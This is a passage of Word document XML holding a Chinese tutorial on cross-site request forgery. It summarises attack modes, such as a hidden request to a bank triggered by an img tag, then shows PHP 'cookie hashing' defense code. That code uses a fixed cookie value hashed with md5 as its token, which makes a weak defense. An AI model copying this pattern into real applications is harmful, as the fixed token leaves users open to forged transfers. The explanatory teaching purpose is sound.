          <w:color w:val="3D81EE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="189865" cy="189865"/>
            <wp:effectExtent l="19050" t="0" r="635" b="0"/>
            <wp:docPr id="196" name="图片 9" descr="复制代码">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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复制代码">
                      <a:hlinkClick r:id="rId10" tooltip="&quot;复制代码&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="189865" cy="189865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>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lastRenderedPageBreak/>
        <w:t>如果用户仍是继续上面的操作，很不幸，结果将会是再次不见</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>1000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>块</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>......</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>因为这里危险网站</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>暗地里发送了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>POST</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>请求到银行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>!</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总结一下上面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>个例子，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>主要的攻击模式基本上是以上的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>种，其中以第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>1,2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>种最为严重，因为触发条件很简单，一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>&lt;img&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>就可以了，而第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>种比较麻烦，需要使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>JavaScript</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，所以使用的机会会比前面的少很多，但无论是哪种情况，只要触发了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>攻击，后果都有可能很严重。</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理解上面的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>种攻击模式，其实可以看出，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>攻击是</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320B5">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>源于</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320B5">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>WEB</w:t>
      </w:r>
      <w:r w:rsidRPr="00A320B5">
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的隐式身份验证机制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>！</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>WEB</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的身份验证机制虽然可以保证一个请求是来自于某个用户的浏览器，但却无法保证该请求是用户批准发送的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>！</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b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>五</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>.CSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>的防御</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我总结了一下看到的资料，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>的防御可以从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="3366FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>服务端</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="3366FF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>客户端</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>两方面着手，防御效果是从服务端着手效果比较好，现在一般的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>防御也都在服务端进行。</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>服务端进行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
        </w:rPr>
        <w:t>防御</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服务端的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>CSRF</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>方式方法很多样，但总的思想都是一致的，就是在客户端页面</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>增加伪随机数</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>。</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w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>(1).Cookie Hashing(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>所有表单都包含同一个伪随机值</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>：</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这可能是最简单的解决方案了，因为攻击者不能获得第三方的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Cookie(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>理论上</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>，所以表单中的数据也就构造失败了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>:&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94D59" w:rsidRDefault="00A94D59" w:rsidP="00A94D59">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>&lt;?php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>构造加密的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>Cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:t>信息</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>$value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> = “DefenseSCRF”;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t>setcookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>(”cookie”, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>$value</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>()+3600);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>?&gt;</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在表单里增加</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>Hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="333333"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:t>值，以认证这确实是用户发送的请求。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94D59" w:rsidRDefault="00A94D59" w:rsidP="00A94D59">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="3D81EE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="189865" cy="189865"/>
            <wp:effectExtent l="19050" t="0" r="635" b="0"/>
            <wp:docPr id="195" name="图片 10" descr="复制代码">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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复制代码">
                      <a:hlinkClick r:id="rId10" tooltip="&quot;复制代码&quot;"/>
                    </pic:cNvPr>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11" cstate="print"/>
                    <a:srcRect/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="189865" cy="189865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94D59" w:rsidRDefault="00A94D59" w:rsidP="00A94D59">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>&lt;?php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="008000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>$hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t> = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="008080"/>
        </w:rPr>
        <w:t>md5</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>$_COOKIE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>['cookie']);</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>&lt;form method=”POST” action=”transfer.php”&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>&lt;input type=”text” name=”toBankId”&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>&lt;input type=”text” name=”money”&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>&lt;input type=”hidden” name=”hash” value=”&lt;?=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="800080"/>
        </w:rPr>
        <w:t>$hash</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>;?&gt;”&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>&lt;input type=”submit” name=”submit” value=”Submit”&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">　　</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>&lt;/form&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A94D59" w:rsidRDefault="00A94D59" w:rsidP="00A94D59">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        <w:rPr>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="3D81EE"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="189865" cy="189865"/>
            <wp:effectExtent l="19050" t="0" r="635" b="0"/>
            <wp:docPr id="194" name="图片 11" descr="复制代码">
              <a:hlinkClick xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" r:id="rId1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复制代码">
                      <a:hlinkClick r:id="rId10" tooltip="&quot;复制代码&quot;"/>
